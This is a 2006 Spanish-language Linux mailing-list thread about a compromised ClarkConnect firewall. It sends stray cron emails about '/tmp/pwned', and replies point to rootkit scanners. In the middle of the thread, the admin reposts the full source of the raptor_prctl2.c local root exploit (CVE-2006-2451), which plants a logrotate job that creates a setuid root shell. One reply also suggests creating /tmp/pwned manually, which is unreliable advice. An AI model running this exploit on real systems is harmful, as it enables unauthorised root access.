Re: [OT] ataque raro a linux
2006/8/22, consultores1 [EMAIL PROTECTED]: El Lunes, 21 de Agosto de 2006 11:46 AM, etr4gu escribió: 2006/8/21, gesala gesala [EMAIL PROTECTED]: Hola!!!ya es sólo pòr curiosidad: Alguna idea de como se colo??? porque según parece el exploit solo se puede explotar de forma local Exacto, el codigo fuente del ejecutable lo encontre con un id de usuario y de grupo 501, cuando el ultimo usuario tenia id 500, durante un tiempo el otro administrador del servidor creo un usuario para pruebas, y despues lo borro, y creo que dado que el ID del usuario borrado debería haber sido 501, creo que con este usuario se colaron. Aunque el otro administrador jura que tenia una contraseña segura, entonces ya no se por donde entraron, y como borraron los logs, me voy a quedar con la duda. Ahora voy a tener una politica mas dura con respecto a la seguridad. La verdad que he leido mucho pero nunca lo implemente, porque pense que a mi no me iba a tocar jeje. saludos Hola Y como saber si lo tienes en tu maquina, por favor? Busca los archivos con SUID 2006/8/21, etr4gu [EMAIL PROTECTED]: Pues, si que era un bicho, para los curiosos aca les paso el codigo del exploit Gracias a todos -- Consultores Agropecuarios Somos expertos en soluciones practicas para la agricultura y ganaderia. Si desea importar o exportar a cualquier parte del mundo, contactenos.
Re: [OT] ataque raro a linux
El 19/08/06, Israel Gutierrez[EMAIL PROTECTED] escribió:
El Jueves, 17 de Agosto de 2006 19:13, etr4gu escribió:
Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755
/tmp/pwned; rm -f /etc/cron.d/core
chown: cannot access `/tmp/pwned': No such file or directory
chmod: cannot access `/tmp/pwned': No such file or directory
Pues sin dar más datos, vete a saber si te han colado un bichito, pero eso
de /tmp/pwned me mosquearía mucho por lo que se parece a /tmp/owned (la p
queda muy cerca de la o)
Pues, si que era un bicho, para los curiosos aca les paso el codigo del exploit
Gracias a todos
Linux Local Root (Exploit)
Added by: A^C^E
Date: 20.07.06
Time: 11:05:52
Category: Exploits
Source: http://www.securiteam.com/exploits/5GP0C2KJ5O.html
Summary
The suid_dumpable support in certain versions of theLinux kernel
allows a local user to cause a denial of service (disk consumption)
attack. Also, the attacker can possibly gain privileges via the
PR_SET_DUMPABLE argument of the prctl function,A program that causes a
core dump file to be created in a directory for which the user does
not have permissions.
Credit:
The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/2031
http://www.0xdeadbeef.info/exploits/raptor_prctl.c
Details
Vulnerable Systems:
* Linux kernel version 2.6.13 to 2.6.17.4
* Linux kernel version 2.6.16 to 2.6.16.24
CVE Information:
CVE-2006-2451
Exploit:
/*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
*
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi [EMAIL PROTECTED]
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451).
*
* This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
*
* Thanks to Solar Designer for the interesting discussion on attack vectors.
*
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
*
* Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked]
* $ ./raptor_prctl2
* [please wait until logrotate is run]
* $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned
* sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00#
* [don't forget to delete /tmp/pwned!]
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include stdio.h
#include unistd.h
#include stdlib.h
#include signal.h
#include sys/stat.h
#include sys/resource.h
#include sys/prctl.h
#define INFO1 raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
#define INFO2 Copyright (c) 2006 Marco Ivaldi [EMAIL PROTECTED]
char payload[] = /* commands to be executed by privileged logrotate */
\n/var/log/core {\n daily\n size=0\n firstaction\n chown root
/tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f
/var/log/core*\n endscript\n}\n;
char pwnage[] = /* build setuid() helper to circumvent bash checks */
echo \main(){setuid(0);setgid(0);system(\\\/bin/sh\\\);}\
/tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned /dev/null; rm -f
/tmp/pwned.c;
int main(void)
{
int pid;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, %s\n%s\n\n, INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, corelimit);
/* let's create a fake logfile in /var/log */
if (!(pid = fork())) {
chdir(/var/log);
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir(/etc/logrotate.d);
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if ((stat(/var/log/core, st) 0) ||
(stat(/etc/logrotate.d/core, st) 0)) {
fprintf(stderr, Error: Not vulnerable? See comments.\n);
exit(1);
}
/* total pwnage */
fprintf(stderr, Please wait until logrotate is run and check /tmp/pwned;)\n);
exit(0);
}
--
BOFH excuse #79:
Look, buddy: Windows 3.1 IS A General Protection Fault.
Re: [OT] ataque raro a linux
Hola!!!ya es sólo pòr curiosidad: Alguna idea de como se colo??? porque según parece el exploit solo se puede explotar de forma local 2006/8/21, etr4gu [EMAIL PROTECTED]: Pues, si que era un bicho, para los curiosos aca les paso el codigo del exploit Gracias a todos
Re: [OT] ataque raro a linux
2006/8/21, gesala gesala [EMAIL PROTECTED]: Hola!!!ya es sólo pòr curiosidad: Alguna idea de como se colo??? porque según parece el exploit solo se puede explotar de forma local Exacto, el codigo fuente del ejecutable lo encontre con un id de usuario y de grupo 501, cuando el ultimo usuario tenia id 500, durante un tiempo el otro administrador del servidor creo un usuario para pruebas, y despues lo borro, y creo que dado que el ID del usuario borrado debería haber sido 501, creo que con este usuario se colaron. Aunque el otro administrador jura que tenia una contraseña segura, entonces ya no se por donde entraron, y como borraron los logs, me voy a quedar con la duda. Ahora voy a tener una politica mas dura con respecto a la seguridad. La verdad que he leido mucho pero nunca lo implemente, porque pense que a mi no me iba a tocar jeje. saludos 2006/8/21, etr4gu [EMAIL PROTECTED]: Pues, si que era un bicho, para los curiosos aca les paso el codigo del exploit Gracias a todos
Re: [OT] ataque raro a linux
El Lunes, 21 de Agosto de 2006 11:46 AM, etr4gu escribió: 2006/8/21, gesala gesala [EMAIL PROTECTED]: Hola!!!ya es sólo pòr curiosidad: Alguna idea de como se colo??? porque según parece el exploit solo se puede explotar de forma local Exacto, el codigo fuente del ejecutable lo encontre con un id de usuario y de grupo 501, cuando el ultimo usuario tenia id 500, durante un tiempo el otro administrador del servidor creo un usuario para pruebas, y despues lo borro, y creo que dado que el ID del usuario borrado debería haber sido 501, creo que con este usuario se colaron. Aunque el otro administrador jura que tenia una contraseña segura, entonces ya no se por donde entraron, y como borraron los logs, me voy a quedar con la duda. Ahora voy a tener una politica mas dura con respecto a la seguridad. La verdad que he leido mucho pero nunca lo implemente, porque pense que a mi no me iba a tocar jeje. saludos Hola Y como saber si lo tienes en tu maquina, por favor? 2006/8/21, etr4gu [EMAIL PROTECTED]: Pues, si que era un bicho, para los curiosos aca les paso el codigo del exploit Gracias a todos -- Consultores Agropecuarios Somos expertos en soluciones practicas para la agricultura y ganaderia. Si desea importar o exportar a cualquier parte del mundo, contactenos.
Re: [OT] ataque raro a linux
El Jueves, 17 de Agosto de 2006 19:13, etr4gu escribió: Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Pues sin dar más datos, vete a saber si te han colado un bichito, pero eso de /tmp/pwned me mosquearía mucho por lo que se parece a /tmp/owned (la p queda muy cerca de la o) -- BOFH excuse #79: Look, buddy: Windows 3.1 IS A General Protection Fault. pgpVFL5ry61MJ.pgp Description: PGP signature
Re: [OT] ataque raro a linux
El 17/08/06, Alejandro Kurchis[EMAIL PROTECTED] escribió: etr4gu escribió: Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha: Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian vulnerado, entonces reinstale todo, pero el problema sigue. Alguien me puede guiar un poco por favor? Como me protejo? realmente estoy vulnerado o es un ataque? mi sistema es [EMAIL PROTECTED] ~]# uname -a Linux gw-st.st.lan 2.6.9-27.cc #1 Mon Oct 24 18:48:25 EDT 2005 i686 i686 i386 GNU/Linux Desde ya muchas gracias Podes comenzar corriendo el chkrootkit y el rkhunter, ambos son escaneadores de rootkits, troyanos y vulnerabilidades, en ppio. Uno esta en www.chkrootkit.org y el otro buscalo en Google. Luego habria que ver, por favor contanos , ya que es verdad esta documentado como un local root exploit. Suerte. Bueno, paso a contarte Al parecer mi co-administrador creo un usuario para el y despues lo borro, y por ahi vino el ataque, encontre el exploit del que hablamos en /usr/share/fonts con el nombre ypall-4 con UID 501, cuando el ultimo usuario creado tienen UID 500, por lo que entiendo que fue con el usuario creado temporalmente. en el mismo directorio estaba un ejecutable un SUID, y se llamaba ypall. Ademas editando los core, alcance a ver el mail del creador del exploit. Ya se que me vulneraron, pero todavia no se como, ahora voy a reinstalar todo y voy a tomar las recomendaciones de debian-harden para clarkconnect, hasta que me anime a hacer un firewall completo en debian. Gracias a todos. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
[OT] ataque raro a linux
Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha: Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian vulnerado, entonces reinstale todo, pero el problema sigue. Alguien me puede guiar un poco por favor? Como me protejo? realmente estoy vulnerado o es un ataque? mi sistema es [EMAIL PROTECTED] ~]# uname -a Linux gw-st.st.lan 2.6.9-27.cc #1 Mon Oct 24 18:48:25 EDT 2005 i686 i686 i386 GNU/Linux Desde ya muchas gracias -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] ataque raro a linux
On Thu, 2006-08-17 at 09:06 -0300, etr4gu wrote: Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Si es completa pero no es la lista de Clackconnect ... Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha:Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Porque no creas el archivo /tmp/pwned manualmente? Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian vulnerado, entonces reinstale todo, pero el problema sigue. Si lo reinstalastes y el problema sigue se puede deber a un error en la distro, probablemente algun servicio no esta creando el fichero /tmp/pwned. Alguien me puede guiar un poco por favor? Crea el fichero /tmp/pwned , no pierdes nada con probar. Como me protejo? realmente estoy vulnerado o es un ataque? mi sistema es [EMAIL PROTECTED] ~]# uname -a Linux gw-st.st.lan 2.6.9-27.cc #1 Mon Oct 24 18:48:25 EDT 2005 i686 i686 i386 GNU/Linux Desde ya muchas gracias -- Guillermo Salas M. Telconet S.A. Calle 15 y Avenida 24 Esq Edificio Barre #2 Primer Piso Telefono : +593 5 262 8071 Celular : +593 9 985 5138 e-mail : [EMAIL PROTECTED] www : http://www.manta.telconet.net http://www.telcocarrier.net Linux User: 255902 Beat me, whip me, make me use Windows! Please avoid sending me Word or PowerPoint attachments. See http://www.fsf.org/philosophy/no-word-attachments.html Please avoid the Top Posting, see http://es.wikipedia.org/wiki/Top-posting -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] ataque raro a linux
etr4gu escribió: Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha: Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian vulnerado, entonces reinstale todo, pero el problema sigue. Alguien me puede guiar un poco por favor? Como me protejo? realmente estoy vulnerado o es un ataque? mi sistema es [EMAIL PROTECTED] ~]# uname -a Linux gw-st.st.lan 2.6.9-27.cc #1 Mon Oct 24 18:48:25 EDT 2005 i686 i686 i386 GNU/Linux Desde ya muchas gracias Podes comenzar corriendo el chkrootkit y el rkhunter, ambos son escaneadores de rootkits, troyanos y vulnerabilidades, en ppio. Uno esta en www.chkrootkit.org y el otro buscalo en Google. Luego habria que ver, por favor contanos , ya que es verdad esta documentado como un local root exploit. Suerte. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] ataque raro a linux
El 17/08/06, Guillermo Salas M.[EMAIL PROTECTED] escribió: On Thu, 2006-08-17 at 09:06 -0300, etr4gu wrote: Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Si es completa pero no es la lista de Clackconnect ... Por eso el OT, pido discultas si molesto a alguien, solo busco ayuda. Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha:Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Porque no creas el archivo /tmp/pwned manualmente? Porque no existe, no deberia llamarlo ningun proceso, es lo que me hace dudar de un ataque Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian vulnerado, entonces reinstale todo, pero el problema sigue. Si lo reinstalastes y el problema sigue se puede deber a un error en la distro, probablemente algun servicio no esta creando el fichero /tmp/pwned. Dudo que sea un problema de la distro, porque la tengo instalada en varios lugares, y solo aca da ese problema. Alguien me puede guiar un poco por favor? Crea el fichero /tmp/pwned , no pierdes nada con probar. Como me protejo? realmente estoy vulnerado o es un ataque? mi sistema es [EMAIL PROTECTED] ~]# uname -a Linux gw-st.st.lan 2.6.9-27.cc #1 Mon Oct 24 18:48:25 EDT 2005 i686 i686 i386 GNU/Linux Desde ya muchas gracias -- Guillermo Salas M. Telconet S.A. Calle 15 y Avenida 24 Esq Edificio Barre #2 Primer Piso Telefono : +593 5 262 8071 Celular : +593 9 985 5138 e-mail : [EMAIL PROTECTED] www : http://www.manta.telconet.net http://www.telcocarrier.net Linux User: 255902 Beat me, whip me, make me use Windows! Please avoid sending me Word or PowerPoint attachments. See http://www.fsf.org/philosophy/no-word-attachments.html Please avoid the Top Posting, see http://es.wikipedia.org/wiki/Top-posting -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] ataque raro a linux
2006/8/17, Jesus Aneiros [EMAIL PROTECTED]: On 8/17/06, etr4gu [EMAIL PROTECTED] wrote: Buenas lista tengo un firewall linux, es un clarkconnect (creo que deriva de fedora o red hat), pero pregunto aqui, dado que es la lista mas completa que encontre. Este firewall andaba bien, y es facil de configurar, pero hace unos dias me empiezan a llegar mas de 2000 mails iguales por dia del servidor diciendo Fecha: Thu, 17 Aug 2006 08:29:01 -0300 (ART) De: Cron Daemon [EMAIL PROTECTED] Para: [EMAIL PROTECTED] Asunto: Cron [EMAIL PROTECTED] chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core chown: cannot access `/tmp/pwned': No such file or directory chmod: cannot access `/tmp/pwned': No such file or directory Sera esto un DoS? buscando en google encontre un exploit (http://www.securiteam.com/exploits/5GP0C2KJ5O.html) que hace algo similar, pero el exploit es local, por lo que creia que me habian Pero es que el mensaje que estás recibiendo es del cron local de gw-st. Así que creo que tienes un problema! vulnerado, entonces reinstale todo, pero el problema sigue. Revisaste las tareas del cron? Parece ser una tarea que está tratando de dar permisos de ejecución a /tmp/pwned pero no existe. Si te fijas después se trata de eliminar un core que es casi siempre lo que deja un exploit, en el directorio /etc/cron.d/core. Creo que utilizaron o trataron de utilizar como vector de ataque al cron. Exacto, revise las tareas del cron, pero no encontre ninguna tarea rara, si encontre 3 archivos core.(un numero) pero no se como analizarlos. Disculpa si me equivoco y te alarmo, no soy especialista en seguridad informática. Es lo que veo del pedacito del subject que copiaste en el mensaje. Mas vale prevenir que curar, muchas gracias Saludos, --aneiros. -- La educación comienza en la cuna y termina en la tumba José de la Luz y Caballero
